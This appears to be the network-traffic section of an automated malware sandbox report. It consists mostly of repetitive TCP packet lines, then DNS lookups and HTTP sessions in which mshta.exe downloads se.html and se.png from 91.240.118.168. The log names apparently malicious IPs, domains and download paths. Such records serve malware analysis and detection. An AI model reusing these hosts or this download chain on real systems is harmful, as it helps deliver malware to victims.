                                                                                                                    Jan 28, 2022 21:08:02.290798903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.290821075 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.290906906 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.295983076 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.296000957 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.296050072 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.301152945 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.301176071 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.301223040 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.306385040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.306404114 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.306463003 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.311420918 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.311439037 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.311482906 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.316550016 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.316567898 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.316617012 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.326189995 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.326210022 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.326271057 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.335361958 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.335383892 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.335423946 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.344439983 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.344455004 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.344520092 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.354043961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.354058981 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.354125977 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.362816095 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.362837076 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.363046885 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.371860027 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.371881962 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.371916056 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.380959034 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.380979061 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.381021023 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.390110016 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.390132904 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.390228033 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.399908066 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.399929047 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.399981976 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.404859066 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.404876947 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.404930115 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.411636114 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.411655903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.411705971 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.417072058 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.417093992 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.417145967 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.421416044 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.421435118 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.421502113 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.426424980 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.426445961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.426501989 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.431842089 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.431860924 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.431906939 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.437187910 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.437211990 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.437261105 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.442547083 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.442567110 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.442624092 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.449357033 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.449389935 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.449440002 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.454421997 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.454453945 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.454514980 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.459620953 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.459651947 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.459712029 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.463557959 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.463587999 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.463639021 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.469877958 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.469926119 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.469989061 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.482002974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.482028961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.482079029 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.482099056 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.482121944 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.482203007 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.488199949 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.488230944 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.488303900 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.497318983 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.497342110 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.497405052 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.507530928 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.507567883 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.507653952 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.516243935 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.516269922 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.516330004 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.526448011 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.526477098 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.526597023 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.534152985 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.534183979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.534288883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.542876005 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.542884111 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.542964935 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.552170992 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.552195072 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.552275896 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.561964035 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.561988115 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.562062025 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.567820072 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.567845106 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.567934036 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.574115992 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.574140072 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.574250937 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.579873085 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.579896927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.810699940 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.810724974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.810784101 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.812216997 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.812243938 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.812294960 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.813651085 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.813676119 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.813730001 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.815224886 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.815249920 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.815327883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.816567898 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.816591024 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.816654921 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.818116903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.818142891 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.818207026 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.819381952 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.819406986 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.819461107 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.820858955 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.820884943 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.820935011 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.822191000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.822216034 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.822259903 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.823611021 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.823640108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.823713064 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.826119900 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.826143026 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.826191902 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.826297998 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.826318979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.826376915 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.827980995 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.828005075 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.828068972 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.830079079 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.830107927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.830162048 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.830842018 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.830847979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.830905914 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.832258940 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.832278013 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.832338095 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.833250046 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.833271027 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.833357096 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.834084988 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.834103107 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.834161043 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.835380077 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.835407019 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.835464954 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.839131117 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839154005 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839169979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839184999 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839226007 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.839247942 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.839657068 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839679003 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.839728117 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.840919971 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.840948105 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.841028929 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.842196941 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.842225075 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.842273951 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.843283892 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.843307972 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.843354940 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.844433069 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.844455957 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.844527960 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.845592022 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.845614910 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.845680952 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.846071005 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.846087933 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.846153975 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.847984076 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.850502968 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.850531101 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.850590944 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.852312088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.855098963 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.964931011 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.964958906 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.965023041 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.965315104 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.965333939 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.965385914 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.966495991 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.966521978 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.966538906 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.966609001 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.967572927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.967592955 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.967665911 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.968723059 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.968748093 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.968821049 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.969926119 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.969958067 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.969997883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.970949888 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.970972061 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.971026897 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.972662926 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.972691059 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.972764969 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.973150015 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.973175049 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.973225117 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.974273920 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.974304914 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.974370956 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.975383997 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.975415945 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.975496054 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.976526022 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.976552963 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.976623058 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.977694035 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.977724075 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.977790117 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.978755951 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.978784084 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.978868961 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.979846954 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.979875088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.979938030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.980938911 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.980967999 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.981046915 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.982070923 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.982104063 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.982177019 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.983197927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.983225107 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.983304024 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.984291077 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.984323978 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.984395027 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:08:02.985440969 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.985467911 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:08:02.985512018 CET4917080192.168.2.2274.208.236.157
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:08:00.706188917 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:08:00.730050087 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 21:08:01.320576906 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:08:01.345886946 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 21:08:00.706188917 CET | 192.168.2.22 | 8.8.8.8 | 0xd877 | Standard query (0) | kuyporn.com | A (IP address) | IN (0x0001)
Jan 28, 2022 21:08:01.320576906 CET | 192.168.2.22 | 8.8.8.8 | 0x54f5 | Standard query (0) | jeffreylubin.igclout.com | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 21:08:00.730050087 CET | 8.8.8.8 | 192.168.2.22 | 0xd877 | No error (0) | kuyporn.com | | 172.67.149.209 | A (IP address) | IN (0x0001)
Jan 28, 2022 21:08:00.730050087 CET | 8.8.8.8 | 192.168.2.22 | 0xd877 | No error (0) | kuyporn.com | | 104.21.11.177 | A (IP address) | IN (0x0001)
Jan 28, 2022 21:08:01.345886946 CET | 8.8.8.8 | 192.168.2.22 | 0x54f5 | No error (0) | jeffreylubin.igclout.com | | 74.208.236.157 | A (IP address) | IN (0x0001)
                                                                                                                    • 91.240.118.168
                                                                                                                    • kuyporn.com
                                                                                                                    • jeffreylubin.igclout.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:07:54.688672066 CET | 0 | OUT
GET /qqw/aas/se.html HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 91.240.118.168
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:07:54.750778913 CET | 2 | IN
HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Fri, 28 Jan 2022 20:07:54 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 11230
                                                                                                                    Last-Modified: Wed, 26 Jan 2022 22:39:54 GMT
                                                                                                                    Connection: keep-alive
                                                                                                                    ETag: "61f1cdba-2bde"
                                                                                                                    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:08:00.606825113 CET | 13 | OUT
GET /qqw/aas/se.png HTTP/1.1
                                                                                                                    Host: 91.240.118.168
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:08:00.666024923 CET | 14 | IN
HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Fri, 28 Jan 2022 20:08:00 GMT
                                                                                                                    Content-Type: image/png
                                                                                                                    Content-Length: 1178
                                                                                                                    Last-Modified: Wed, 26 Jan 2022 22:58:47 GMT
                                                                                                                    Connection: keep-alive
                                                                                                                    ETag: "61f1d227-49a"
                                                                                                                    Accept-Ranges: bytes
